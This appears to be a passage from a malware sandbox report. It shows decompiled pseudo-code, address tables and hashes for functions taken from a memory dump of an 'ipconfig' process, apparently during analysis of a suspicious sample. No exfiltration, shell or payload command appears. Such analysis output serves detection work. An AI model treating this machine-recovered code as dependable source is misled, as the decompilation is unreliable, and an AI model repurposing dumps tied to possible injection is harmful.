			}


























              0x02ec4bad
              0x02ec4bbf
              0x02ec4bc2
              0x02ec4bc6
              0x02ec4bcd
              0x02ec4bd9
              0x02f067fe
              0x02f06800
              0x02ec4ccc
              0x02ec4ccd
              0x02ec4cb7
              0x02ec4cc9
              0x02ec4cc9
              0x02ec4bdf
              0x02ec4be5
              0x00000000
              0x00000000
              0x02ec4beb
              0x02ec4bef
              0x00000000
              0x00000000
              0x02ec4bf5
              0x02ec4bf9
              0x02ec4c06
              0x02ec4c0b
              0x02ec4c17
              0x02ec4c1c
              0x02ec4c1f
              0x02ec4c25
              0x02ec4c33
              0x02ec4c3d
              0x02ec4c40
              0x02ec4c43
              0x02ec4c47
              0x02ec4c4d
              0x02ec4c53
              0x02ec4c54
              0x02ec4c55
              0x02ec4c56
              0x02ec4c5b
              0x02ec4c5c
              0x02ec4c63
              0x02ec4c6b
              0x00000000
              0x00000000
              0x02f06776
              0x02f06784
              0x02f06784
              0x02f0679f
              0x02f067a7
              0x02f067af
              0x02f067ce
              0x00000000
              0x02f067b1
              0x02f067b7
              0x02f067b8
              0x02f067c1
              0x02f067d3
              0x02f067d9
              0x02f067dd
              0x02ec4c94
              0x02ec4c94
              0x02ec4c98
              0x02ec4c9c
              0x02ec4ca3
              0x02f067f4
              0x02f067f4
              0x02ec4cb5
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x02ec4cb5
              0x02ec4c79
              0x02ec4c7e
              0x02ec4c89
              0x02ec4c8b
              0x02ec4c8f
              0x02ec4c8f
              0x00000000
              0x02ec4c89
              0x02f067c3
              0x00000000
              0x02f067c3
              0x02f067af
              0x02ec4c73
              0x00000000
              0x00000000
              0x00000000

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8b0254bdda62b95029d43143951145cfcb60796502741fd4d1fc38779c5b036a
              • Instruction ID: 79ee95c60e8b3182509e83f78ef0e3c80ab4f2bb4335a433d1c6fccbf1569310
              • Opcode Fuzzy Hash: 8b0254bdda62b95029d43143951145cfcb60796502741fd4d1fc38779c5b036a
              • Instruction Fuzzy Hash: 4441B535E8022C9BDB21DF64C940FEA77B9AF45740F1150A9E908EB290DB34DE81CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EC4D3B Relevance: .1, Instructions: 131COMMON
              Download Yara Rule
              C-Code - Quality: 78%
              			E02EC4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x2f8d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E02EDFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x2f87bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E02EDB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L02EB4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E02E9CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E02EDB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E02EDF380(_t67 + 0xc, 0x2e75138, 0x10) == 0) {
								 *0x2f860d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E02EC4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E02EC4E70(0x2f886b0, 0x2ec5690, 0, 0) != 0) {
					_t46 = E02E9CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















              0x02ec4d3b
              0x02ec4d4d
              0x02ec4d53
              0x02ec4d58
              0x02ec4d65
              0x02ec4d6c
              0x02ec4d71
              0x02ec4d77
              0x02ec4d7f
              0x02ec4d8c
              0x02ec4d8e
              0x02ec4dad
              0x02ec4db0
              0x02ec4db7
              0x02ec4db8
              0x02ec4db9
              0x02ec4dba
              0x02ec4dbb
              0x02ec4dc1
              0x02ec4dc8
              0x02ec4dcc
              0x02ec4dd5
              0x02ec4dde
              0x02ec4ddf
              0x02ec4de0
              0x02ec4de1
              0x02ec4de6
              0x02ec4de7
              0x02ec4de9
              0x02ec4df3
              0x00000000
              0x00000000
              0x02f06c7c
              0x02f06c8a
              0x02f06c8a
              0x02f06c9d
              0x02f06ca7
              0x02f06cac
              0x02f06cb2
              0x02f06cb9
              0x00000000
              0x02f06cbf
              0x02f06cbf
              0x00000000
              0x02f06cbf
              0x02f06cb9
              0x02ec4dfb
              0x02f06ccf
              0x02f06cd3
              0x02ec4e32
              0x02ec4e39
              0x02f06ce0
              0x02f06cf2
              0x02f06cf2
              0x02f06ce0
              0x02ec4e3f
              0x02ec4e41
              0x02ec4e51
              0x02ec4e51
              0x02ec4e03
              0x02ec4e03
              0x02ec4e09
              0x02ec4e0f
              0x02ec4e57
              0x00000000
              0x00000000
              0x02ec4e1b
              0x02ec4e30
              0x02ec4e5b
              0x02ec4e5b
              0x00000000
              0x02ec4e30
              0x02ec4e11
              0x02ec4e11
              0x02ec4e16
              0x00000000
              0x02ec4e16
              0x02ec4e01
              0x00000000
              0x02ec4e01
              0x02ec4da5
              0x02f06c6b
              0x00000000
              0x02ec4dab
              0x02ec4dab
              0x00000000
              0x02ec4dab

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7c65083d160059e218c718b97a3031e80efb93accb531e7a8a1d2d518dc9d08b
              • Instruction ID: 5accbc1a1e2f798c06e4c3f516ad7ec2238ac0280f9e613fe634740276928b65
              • Opcode Fuzzy Hash: 7c65083d160059e218c718b97a3031e80efb93accb531e7a8a1d2d518dc9d08b
              • Instruction Fuzzy Hash: E941EEB1A803189FEB21DF64CD90BABB7AAEB44714F11909EE9469B2C0D770DD41CA91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EA8A0A Relevance: .1, Instructions: 120COMMON
              Download Yara Rule
              C-Code - Quality: 94%
              			E02EA8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x2f8d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E02EDB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E02EAE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x2e71180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E02EC1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E02ED3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E02EA8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























              0x02ea8a0a
              0x02ea8a1c
              0x02ea8a23
              0x02ea8a2e
              0x02ea8a30
              0x02ea8a36
              0x02ea8a3c
              0x02ea8a3e
              0x02ea8a4a
              0x02ea8a52
              0x02ea8a9c
              0x02ea8aae
              0x02ea8a58
              0x02ea8a5e
              0x02ea8a6a
              0x02ea8a6f
              0x02ea8a75
              0x02ea8a7d
              0x02ea8a85
              0x02ea8a86
              0x02ea8a89
              0x02ea8a93
              0x02ea8a99
              0x02ea8a9b
              0x00000000
              0x02ea8aaf
              0x02ea8abe
              0x02ea8ac3
              0x02ea8acb
              0x02ea8ad7
              0x02ea8ae0
              0x02ea8af1
              0x00000000
              0x02ea8af1
              0x02ea8acd
              0x02ea8ad5
              0x02ea8afb
              0x02ea8afd
              0x02ea8aff
              0x02ea8b07
              0x02ea8b22
              0x02ea8b24
              0x02ea8b2a
              0x02ea8b2e
              0x02ea8b3f
              0x02ea8b78
              0x02ea8b41
              0x02ea8b52
              0x02ea8b54
              0x02ea8b5c
              0x02ea8b74
              0x02ea8b74
              0x02ea8b5c
              0x02ea8b3f
              0x02ea8b5e
              0x02ea8b61
              0x02ea8b64
              0x02ea8b64
              0x02ea8b6c
              0x02ea8b6c
              0x02ea8b11
              0x02ef9cd5
              0x02ef9cd5
              0x02ea8b17
              0x02ea8b1a
              0x02ea8b1a
              0x00000000
              0x02ea8ad5
              0x02ea8a89

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 841e1481fafccf950c76554cfcb81d94b28daaf50a534ed53ff292ae1f877d8d
              • Instruction ID: 09bcc67baaac65e237dd6f3b6e7105999ba38bf34a251b1c40b4f9c5dfaf7373
              • Opcode Fuzzy Hash: 841e1481fafccf950c76554cfcb81d94b28daaf50a534ed53ff292ae1f877d8d
              • Instruction Fuzzy Hash: 5C4183B4A8122C9BDB64DF15CCA8BE9B7F5FB44304F1095EAD8199B241E770AE80CF50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F5AA16 Relevance: .1, Instructions: 120COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E02F5AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E02F5ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E02F5AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E02F5AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E02F3CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L02EB77F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E02EB7D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E02F5131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E02F3CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}



















              0x02f5aa1f
              0x02f5aa21
              0x02f5aa23
              0x02f5aa2b
              0x02f5aa30
              0x02f5aa36
              0x02f5aa39
              0x02f5aa42
              0x02f5aa75
              0x02f5aa7a
              0x02f5aa7c
              0x02f5aa7c
              0x02f5aa88
              0x02f5aa8a
              0x02f5aa8f
              0x02f5ab02
              0x02f5ab04
              0x02f5aa99
              0x02f5aaa8
              0x02f5aaaf
              0x02f5aab3
              0x02f5aacc
              0x02f5aad1
              0x02f5aad6
              0x02f5aae0
              0x02f5aaf3
              0x02f5aaf9
              0x02f5aafe
              0x02f5aafe
              0x02f5aaf3
              0x02f5aad6
              0x02f5aab3
              0x02f5ab07
              0x02f5ab0a
              0x02f5ab11
              0x02f5ab23
              0x02f5ab13
              0x02f5ab1c
              0x02f5ab1c
              0x02f5ab2b
              0x02f5ab44
              0x02f5ab44
              0x02f5ab51
              0x02f5ab51
              0x02f5aa44
              0x02f5aa47
              0x02f5aa4c
              0x00000000
              0x00000000
              0x02f5aa5a
              0x02f5aa64
              0x02f5aa72
              0x00000000
              0x02f5aa66
              0x02f5aa66
              0x02f5aa68
              0x02f5aa6a
              0x00000000
              0x02f5aa6a

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
              • Instruction ID: 6a0a26c3343ce0ee44edf95f1d8bcf1f403444c65f3abf492472c7ee6ece6ce1
              • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
              • Instruction Fuzzy Hash: E5311532F009647BDB158B65CC44BAFFBABEF80390F058169EF04A7281DB709D20CA90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F5FDE2 Relevance: .1, Instructions: 116COMMON
              Download Yara Rule
              C-Code - Quality: 76%
              			E02F5FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E02F5FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E02F60A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E02EB7D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E02F51608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E02F62B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E02F5C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E02F5DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E02EB7D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E02F5A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










              0x02f5fde7
              0x02f5fde8
              0x02f5fdec
              0x02f5fdee
              0x02f5fdf5
              0x02f5fdf7
              0x02f5fdfc
              0x02f5fe19
              0x02f5fe22
              0x02f5fe26
              0x02f5fec6
              0x02f5fecd
              0x02f5fed5
              0x02f5fee7
              0x02f5fed7
              0x02f5fee0
              0x02f5fee0
              0x02f5feef
              0x02f5ff00
              0x02f5ff02
              0x02f5ff07
              0x02f5ff07
              0x00000000
              0x02f5feef
              0x02f5fe33
              0x02f5fe55
              0x02f5fe59
              0x02f5fe5b
              0x02f5fe5e
              0x02f5fe69
              0x02f5fe6d
              0x02f5fe6d
              0x02f5fe69
              0x02f5fe35
              0x02f5fe41
              0x02f5fe41
              0x02f5fe79
              0x02f5fe8b
              0x02f5fe7b
              0x02f5fe84
              0x02f5fe84
              0x02f5fe93
              0x00000000
              0x02f5fea8
              0x02f5feba
              0x00000000
              0x02f5feba
              0x02f5fdfe
              0x02f5fe01
              0x02f5fe02
              0x02f5fe08
              0x02f5ff0c
              0x02f5ff14
              0x02f5ff14

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
              • Instruction ID: 344c201f6530cbcc0c1f72ea121b4ecd89bb589f4d7540910d8aae6eee85a05b
              • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
              • Instruction Fuzzy Hash: 9631E7327006506FD7229768C844F6ABBEAEBC67D4F184698EF4A8BF41DB74D841C710
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F5EA55 Relevance: .1, Instructions: 111COMMON
              Download Yara Rule
              C-Code - Quality: 70%
              			E02F5EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E02EB2280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E02F5E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E02E9F900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E02EAFFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E02F5AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E02F5BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E02EB7D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E02F4FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E02EAFFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E02F5A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















              0x02f5ea55
              0x02f5ea66
              0x02f5ea68
              0x02f5ea6c
              0x02f5ea6f
              0x02f5ea72
              0x02f5ea75
              0x02f5ea7a
              0x02f5ea7a
              0x02f5ea7e
              0x02f5ea80
              0x02f5ea85
              0x02f5ea8b
              0x02f5eab5
              0x02f5eabc
              0x02f5eabf
              0x02f5eabf
              0x02f5eaca
              0x02f5eace
              0x02f5ead0
              0x02f5eae4
              0x02f5eaeb
              0x02f5eaf0
              0x02f5eaf5
              0x02f5eb09
              0x02f5eb0d
              0x02f5eb1d
              0x02f5eb2d
              0x02f5eb38
              0x02f5eb3d
              0x02f5eb41
              0x02f5eb4a
              0x02f5eb60
              0x02f5eb4c
              0x02f5eb52
              0x02f5eb59
              0x02f5eb59
              0x02f5eb68
              0x02f5eb71
              0x02f5eb71
              0x02f5ea8d
              0x02f5ea8f
              0x02f5ea92
              0x02f5ea97
              0x02f5ea97
              0x02f5ea9b
              0x02f5ea9c
              0x02f5ea9e
              0x02f5eaa6
              0x02f5eaa6
              0x02f5eb7e

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
              • Instruction ID: fc659322fd8ded89a9bbdc2963fc646527013900090baef8cd803f905d9da928
              • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
              • Instruction Fuzzy Hash: 0C318E76604715ABC719DF24C880A6BB7AAFFC0390F048A2DFA5687641DB34E915CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F169A6 Relevance: .1, Instructions: 108COMMON
              Download Yara Rule
              C-Code - Quality: 69%
              			E02F169A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x2f8d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L02EA6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E02F16BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E02ED9980() >= 0) {
							E02EB2280(_t56, 0x2f88778);
							_t77 = 1;
							_t68 = 1;
							if( *0x2f88774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x2f88774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E02E9B6F0(0x2e7c338, 0x2e7c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E02ED9520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E02ED95D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E02EAFFB0(_t68, _t77, 0x2f88778);
				}
				_pop(_t78);
				return E02EDB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































              0x02f169b5
              0x02f169be
              0x02f169c3
              0x02f169c9
              0x02f169cc
              0x02f169d1
              0x02f169d3
              0x02f169de
              0x02f169e1
              0x02f169ea
              0x02f169f6
              0x02f169fe
              0x02f16a13
              0x02f16a14
              0x02f16a15
              0x02f16a16
              0x02f16a1e
              0x02f16a26
              0x02f16a31
              0x02f16a36
              0x02f16a37
              0x02f16a40
              0x02f16a49
              0x02f16a4a
              0x02f16a53
              0x02f16a59
              0x02f16a5d
              0x02f16a5e
              0x02f16a64
              0x02f16a67
              0x02f16a6a
              0x02f16a6d
              0x02f16a70
              0x02f16a77
              0x02f16a7d
              0x02f16a86
              0x02f16a89
              0x02f16a9c
              0x02f16a9f
